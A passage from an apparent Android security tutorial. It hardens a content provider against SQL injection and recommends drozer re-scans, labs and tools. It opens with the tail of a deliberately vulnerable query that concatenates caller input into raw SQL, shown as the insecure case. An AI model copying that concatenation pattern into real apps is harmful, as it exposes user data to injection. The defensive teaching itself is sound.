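        String sql = "SELECT " + columns + " FROM " + TABLE;
        if (selection != null) sql += " WHERE (" + selection + ")";
        return helper.getReadableDatabase().rawQuery(sql, null);
    }

    // HARDENED: SQLiteQueryBuilder maps the projection through the allowlist (an unknown
    // column raises IllegalArgumentException instead of reaching SQLite), binds selectionArgs
    // as parameters, and strict mode validates the selection so it cannot smuggle in extra SQL.
    @Override
    public Cursor query(Uri uri, String[] projection, String selection,
                        String[] selectionArgs, String sortOrder) {
        SQLiteQueryBuilder qb = new SQLiteQueryBuilder();
        qb.setTables(TABLE);
        qb.setProjectionMap(PROJECTION_MAP);
        qb.setStrict(true);
        Cursor cursor = qb.query(helper.getReadableDatabase(), projection, selection,
                selectionArgs, null, null, sortOrder);
        cursor.setNotificationUri(getContext().getContentResolver(), uri);
        return cursor;
    }

    // Callers should bind values instead of concatenating them:
    //   resolver.query(uri, new String[]{"name"}, "name = ?", new String[]{userInput}, null);
    //
    // Just as important is the manifest: drozer could reach this provider at all only because
    // it was exported. Keep it private unless another app genuinely needs it:
    //   <provider android:name=".UserDetailsProvider"
    //             android:authorities="com.androidpentesting.vulcontentprovider.data"
    //             android:exported="false" />
    // and if it must be exported, protect it with android:permission / android:readPermission.

    @Override public String getType(Uri uri) { return "vnd.android.cursor.dir/vnd.userdetails"; }

    // ContentValues are bound as parameters by SQLiteDatabase.insert(), so this is safe as is
    @Override public Uri insert(Uri uri, ContentValues values) {
        long id = helper.getWritableDatabase().insert(TABLE, null, values);
        return Uri.withAppendedPath(uri, String.valueOf(id));
    }

    // Read-only provider for this example; a writable one must apply the same
    // allowlist-and-bind discipline to its where clauses
    @Override public int delete(Uri uri, String selection, String[] selectionArgs) {
        throw new UnsupportedOperationException("read-only");
    }
    @Override public int update(Uri uri, ContentValues values, String selection, String[] selectionArgs) {
        throw new UnsupportedOperationException("read-only");
    }
}
```

Re-running scanner.provider.injection against the hardened version should report the URI under "Not Vulnerable", and app.package.attacksurface should report 0 content providers exported once the manifest change is in.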

Resources

Reversing App

  • https://www.channyeinwai.com/2020/11/08/infosec-mobile-ctf-challenge-1/
  • https://ragingrock.com/AndroidAppRE/
  • https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05c-Reverse-Engineering-and-Tampering.md

Firebase Database Takeover Vulnerability

  • https://www.channyeinwai.com/2020/11/09/how-i-was-able-to-find-firebase-database-takeover-vulnerability-in-a-company/

Courses

Highly recommend checking this one out. It is free and super cool.

  • https://manifestsecurity.com/android-application-security/

Books

  • https://www.amazon.com/Mobile-Application-Hackers-Handbook/dp/1118958500

Labs

  • https://github.com/abhi-r3v0/EVABS
  • https://github.com/OWASP/owasp-mstg/tree/master/Crackmes
  • https://github.com/B3nac/InjuredAndroid
  • https://github.com/dineshshetty/Android-InsecureBankv2
  • https://github.com/payatu/diva-android

Tools

  • adb
  • jdgui
  • Frida
  • drozer
  • dex2jar
  • apktool
  • SQLite Browser
  • MobsF

Checklist

  • https://github.com/OWASP/owasp-mstg

Hackerone Android Report And Resources

  • https://github.com/B3nac/Android-Reports-and-Resources